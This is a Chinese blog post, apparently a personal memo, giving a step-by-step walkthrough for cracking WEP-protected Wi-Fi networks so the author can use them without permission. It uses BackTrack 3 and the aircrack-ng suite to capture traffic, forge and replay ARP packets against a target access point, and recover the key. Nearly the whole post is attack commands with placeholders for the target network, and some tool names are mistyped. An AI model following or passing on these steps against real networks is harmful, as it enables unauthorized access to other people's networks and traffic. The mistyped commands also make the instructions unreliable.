魅力博客

魅力Linux|魅力空间|魅力博客|学习Linux|ubuntu日记|电脑教程|手机软件

蹭网教程:BT3破解WEP无线网络步骤整理



今天根据google来的一些资料,成功破解了几个WEP无线网络,由于google来的资料比较杂乱,以下为我破解过程中手写的过程,在此以做备忘。
对于有无Client连接的AP,都使用此过程可破解WEP。

使用BT3从U盘启动,BT3下载地址如下:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb
下载此文件后,将其中文件放到U盘,并确保boot和BT3目录放在U盘根目录,执行boot目录下的bootinst.sh,一路回车后BT3启动盘制作完成。

1、用BT3启动,使用KDE。

2、modprobe -r iwl3945

3、modprobe ipwraw
注:以上两步为是为我的intel 3945ABG网卡加载驱动模块,第一步是卸载原有模块,第二步是加载新模块。
对于在gentoo下没有ipwraw的,可以去下面地址下载:
       wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/ipwraw-ng-2.3.4-04022008.tar.bz2
     下载后解压,然后make && make install && make install_ucode后,再加载此模块。


4、先使用Airoscript查看可用的无线网络
    不能在命令行下输入,要在菜单中找到Airosocript(在哪忘了,在B开头的菜单,找一会能找到)

5、打开新窗口,输入以下:
     airodump-ng --ivs -w outputs -c 6 wifi0
     注:outputs是保存的监控的数据文件名, 6是目标AP的Channel, wifi0是你的网卡设备号

6、打开新窗口,输入以下
    aireplay-ng -1 0 -e ESSID -a APMAC -h LOCALMAC wifi0
    以上ESSID是目标网络的ESSID, APMAC是目标AP的MAC  LOCALMAC是本地网卡的MAC,这些都可以从第4步中找
到,或者使用ifconfig、iwconfig、iwlist来查找

7、生成XOR文件用于向目标AP发送攻击包
    aireplay-ns -5 -b APMAC -h LOCALMAC wifi0
    出现Read packages字样后等待,有时读几百个包就结束,有时读几十万个也不结束,貌似要看人品。。。
    结束后出现 Use this packet ?后,输入y,在当前目录生成了.xor扩展保的文件。

8、准备发送攻击包
    packetforge-ng -o -a APMAC -h LOCALMAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx.xor -w mrarp
    注:上面的-l是L的小写,.xor就是第6步生成的文件。

9、发送攻击包
     areplay-ng -2 -r mrarp -x 1024 wifi0
     1024是发包间隔,以避免攻击包速度太快将对方AP搞跨。
     执行此步后,会发现第4步输入后的窗口中,目标AP的记录中的DATA疯狂的增长,说明攻击成功。

10、当DATA增长至3万左右时,开新窗口,输入以下:
     aircrack-ng -n 64 -b APMAC outputs-0.ivs
     注:64指的是64位加密,如果是128的则换成128,.ivs是第4步命令时生成的数据文件,一般文件名就是第4步起的名字后加数字后缀。

    如果人品好,密码就会以16进制显示出来了!


返回顶部

发表评论:

Powered By Z-BlogPHP 1.7.3


知识共享许可协议
本作品采用知识共享署名 3.0 中国大陆许可协议进行许可。
网站备案号粤ICP备15104741号-1